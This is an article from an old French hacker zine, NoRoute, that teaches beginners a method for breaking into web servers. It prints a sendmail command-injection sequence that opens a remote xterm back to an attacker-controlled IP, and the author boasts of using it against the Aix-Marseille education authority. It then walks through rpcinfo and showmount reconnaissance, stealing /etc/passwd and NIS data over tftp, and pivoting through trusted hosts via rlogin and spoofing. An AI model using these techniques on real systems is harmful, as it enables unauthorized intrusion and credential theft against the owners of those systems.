Copy Link
Add to Bookmark
Report
N0RoUTE Issue 2-10 Discours de la methode
-----------------------------------------------------------------------------
(''''''''''''''''''')
( la bonne methode )
( By CoD4 )
( PhE! )
(___________________)
1: Introduction
J'ai voulu faire se petit file pour tous ceux qui en ont marre de passer par
PHF ou autre FTP writable :). C'est vrai que c'est le plus beau des bugs mais
bon, ca va un moment ;). Ca va etre aussi un petit article bien sympa pour
ceux qui debutent.
2: Let me play !!!
Voila ca fait longtemps que vous reviez de vous faire ce putain de site ;)
Bon, vous avez essaye le PHF mais il vous a gentiment dit qu'il etait pas la
:) Mais oui, 'faut poa rever non plus...
3: De la methode
Premier truc a faire: faites un tour par le Sendmail si vous avez droit
a un sendmail bien pourri genre 4.x ou 5.x, vous pouvez surement executer
des commandes par lui, exemple la methode qu'on a utilisé pour l'académie
de Aix-Marseille :)
mail from:"|xterm -display 123.123.123.123:0 & "
rcpt to: nosay
data
.
quit
Hop! la, le sendmail va vous envoyer un zoli xterm :)
5: rpcinfo
rpcinfo est ma commande preferée :) elle va nous en dire un peu plus sur
le site. Lancez ca : rpcinfo -p www.bibi.org
Hop! analysez bien tout ca :) regardez quel demon est present. Si il y a
ypserv ben il y'a NIS, yeah! vous pouvez lire mon filez inclu ce mois-ci dans
NoRoute :) on peut aussi voir si on as tftpboot ou bootparam (pour bootparam
allez faire un tour dans filez sur NIS =)
6: tftp
Ben la sa va etre cool :) essayez d'abord de choper le /etc/passwd.
Si vous l'avez et qu'il est pas shadow, ben c'est kewl. mais il y'a de fortes
chances k'il soit shadow :( bon si il y'a NIS vous pouvez quand meme recuperer
le nom de domain NIS sans trop de bleme et piquer le /etc/netgroup. Dedans,
vous avez le nom de domaine NIS a 90% de chances.
7: showmount
Pareil, faites un 'chit showmount -e www.bibi.org et regardez si la machine
fait confiance et surtout si elle exporte des repertoires a tout le monde, ce
qui est interessant c'est de voir a qui la machine exporte ses reps car il
est peut-etre plus facile de se faire l'autre machine pour ensuite revenir a
l'autre (la tache sera plus facile car ils se font confiance :)
8: Conclusion
N'oubliez pas qu'il sera souvent plus simple de se faire une machine
totalement perdue dans le domaine de la victim ke de se faire directement
le serveur WEB n'oubliez poa attaquez d'abord le plus faible :) puis
ensuite propagez vous a grands coups de rlogin et spoofez le reseau jusqu'a
arriver a votre cible !
Vous voyez que je ne parle de spoofing car en fait, il se trouve que je ne
aucun log de spoof capable de faire du rlogin :'/
v0x est en train d'n developper un :) peut-etre dans le prochain NoRoute
vous aurez un fabuleux spoofeur de rlogin :)
Sinon, comme vous le voyez cette article est vraiment sans pretention. Je
montre juste une methode qui me parait la plus valable. Si vous voulez en
savoir plus, ben relisez le filez quee mikasoft et moi meme avons ecrit pour
le #1 voila :) bye
CoD4! (raah, t'ecris trop mal mon gars :)) -- hOtCodE)
greetzZZ to : p4c3m4k3r voila un greetz rien ke pour lui :)
( on se comprends :)